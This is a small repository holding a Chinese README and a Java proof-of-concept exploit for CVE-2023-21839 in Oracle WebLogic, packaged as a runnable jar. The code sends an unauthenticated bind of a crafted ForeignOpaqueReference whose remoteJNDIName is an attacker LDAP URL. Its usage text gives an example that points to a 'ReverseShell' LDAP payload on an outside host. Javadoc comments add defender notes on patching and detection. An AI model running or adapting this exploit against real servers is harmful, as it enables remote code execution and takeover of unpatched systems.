├── README.md
└── Weblogic-CVE-2023-21839
    └── src
        ├── CVE_2023_21839.java
        └── META-INF
            └── MANIFEST.MF


/README.md:
--------------------------------------------------------------------------------
# Weblogic-CVE-2023-21839

CVE-2023-21839 根据网络公开poc造的轮子

影响版本

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0


使用方法
> java -jar 目标ip:端口 ldap地址

推荐工具:

https://github.com/WhiteHSBG/JNDIExploit

# 免责声明
此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用!

如果使用者使用该工具出现任何非法攻击等违法行为,与作者无关!

--------------------------------------------------------------------------------
/Weblogic-CVE-2023-21839/src/CVE_2023_21839.java:
--------------------------------------------------------------------------------
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

/**
 * Proof-of-concept client for CVE-2023-21839 in Oracle WebLogic Server (the README lists
 * 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 as affected).
 *
 * <p>What the code does: it opens a JNDI context to the server over T3, binds a
 * {@code ForeignOpaqueReference} whose {@code remoteJNDIName} field was set by reflection to a
 * caller-supplied URL, and then looks the same name up again. Per public write-ups of this CVE,
 * the server resolves {@code remoteJNDIName} itself during that lookup, which is what turns a
 * bind into a server-side JNDI request to an address chosen by the client.
 *
 * <p>Defender notes:
 * <ul>
 *   <li>No credentials are sent: the context environment built below holds only the factory and
 *       the provider URL, so the bind is made as an anonymous T3 client.</li>
 *   <li>Fix: Oracle addressed this CVE in the January 2023 Critical Patch Update; patching is the
 *       remedy, and restricting T3/IIOP to trusted networks (for example with a WebLogic
 *       connection filter) narrows exposure until then.</li>
 *   <li>Detection: outbound LDAP or RMI connections initiated by a WebLogic host, and JNDI
 *       entries whose name is a bare signed 64-bit number (see {@code bindName} below). The
 *       entry is never unbound by this code, so it may remain in the JNDI tree as an
 *       artifact.</li>
 * </ul>
 *
 * <p>The class references {@code weblogic.*} types directly, so it only compiles and runs with
 * the WebLogic client classes on the classpath.
 */
public class CVE_2023_21839 {
    // Class name of WebLogic's JNDI initial-context factory, passed as INITIAL_CONTEXT_FACTORY.
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    // Usage text printed when fewer than two arguments are given.
    static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址\ne.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    /**
     * Creates a JNDI {@link InitialContext} for the given provider URL using the WebLogic
     * context factory.
     *
     * <p>The environment carries no principal or credential entries, so the connection is
     * unauthenticated; a server that accepts it is reachable by any client that can route to
     * the T3 port.
     *
     * @param url provider URL; {@code main} passes {@code "t3://" + host:port}
     * @return the initial context returned by {@code new InitialContext(env)}
     * @throws NamingException if the context cannot be created
     */
    private static InitialContext getInitialContext(String url)throws NamingException
    {
        // Raw Hashtable, as the JNDI API accepts; holds exactly two entries.
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }

    /**
     * Entry point: binds a crafted {@code ForeignOpaqueReference} on the target and looks it up.
     *
     * @param args {@code args[0]} is the target {@code host:port}; {@code args[1]} is the URL
     *             written into the reference's {@code remoteJNDIName} field
     * @throws Exception reflection or context-creation failures propagate; failures of the
     *                   bind/lookup pair are swallowed (see the catch block)
     */
    public static void main(String args[]) throws Exception {
        // Fewer than two arguments: print usage and exit with status 0.
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        // The "t3://" scheme is prepended here, so args[0] must be a bare host:port.
        InitialContext c=getInitialContext("t3://"+t3Url);
        // Environment stored inside the reference; only the initial-context factory is set.
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        // Both fields are written through reflection with setAccessible(true), i.e. they are
        // not settable through the class's accessible API from here (presumably private).
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        // remoteJNDIName receives the caller-supplied URL unchanged; nothing validates it here.
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        // Throwaway binding name: decimal text of a long from a time-seeded Random. Entries
        // named like this in a server's JNDI tree are a useful hunting indicator.
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            // bind stores the object on the server; lookup makes the server resolve it.
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }
        // The empty catch discards every exception from bind/lookup, so the program prints
        // nothing about the outcome; the context is not closed and the name is not unbound.

    }
}
--------------------------------------------------------------------------------
/Weblogic-CVE-2023-21839/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
Manifest-Version: 1.0
Main-Class: CVE_2023_21839
Class-Path: CVE_2023_21839

--------------------------------------------------------------------------------